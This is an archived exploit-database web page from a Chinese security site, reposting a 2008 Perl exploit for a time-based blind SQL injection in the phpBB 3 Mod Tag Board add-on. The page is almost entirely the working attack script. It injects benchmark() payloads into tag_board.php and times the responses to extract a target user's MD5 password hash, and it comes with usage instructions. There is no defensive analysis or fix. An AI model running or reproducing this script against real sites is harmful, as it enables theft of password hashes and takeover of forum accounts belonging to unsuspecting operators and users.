首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
来源:staker[at]hotmail[dot]it 作者:athos 发布时间:2008-12-09  
#!/usr/bin/perl
# ---------------------------------------------------------------
# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit 
# by athos - staker[at]hotmail[dot]it
# http://bx67212.netsons.org/forum/viewforum.php?f=3
# ---------------------------------------------------------------
# Note: Works regardless PHP.ini settings!
# Thanks meh also know as cHoBi
# ---------------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($hash,$time1,$time2);

my @chars = (48..57, 97..102);
my $http  = new LWP::UserAgent;

my $host  = shift;
my $table = shift;
my $myid  = shift or &usage;


sub injection
{
    my ($sub,$char) = @_;
   
    return "/tag_board.php?mode=controlpanel&action=delete&id=".
           "1+and+(select+if((ascii(substring(user_password,${sub},1)".
           ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
           "ers+where+user_id=${myid})--";
}


sub usage
{
    print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
    print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
    print STDOUT "by athos - staker[at]hotmail[dot]it\n";
    exit;
}


syswrite(STDOUT,'Hash MD5: ');

for my $i(1..33)
{
    for my $j(0..16)
    {
        $time1 = time();

        $http->get($host.injection($i,$chars[$j]));
       
        $time2 = time();

        if($time2 - $time1 > 6)
        {
            syswrite(STDOUT,chr($chars[$j]));
            $hash .= chr($chars[$j]);
            last;
        }
       
        if($i == 1 && length $hash < 0)
        {
            syswrite(STDOUT,"Exploit Failed!\n");
            exit;
        }
    }
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·XAMPP 1.6.8 (XSRF) Change Admi
·Neostrada Livebox Router Remot
·Simple Directory Listing 2 Cro
·DD-WRT v24-sp1 (XSRF) Cross Si
·phpMyAdmin 3.1.0 (XSRF) SQL In
·SIU Guarani Multiple Remote Vu
·MG2 0.5.1 (filename) Remote Co
·linux x86 shellcode obfuscator
·Vinagre < 2.24.2 show_error()
·w3blabor CMS 3.0.5 Arbitrary F
·EasyMail ActiveX (emmailstore.
·PayPal eStore Admin Password C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved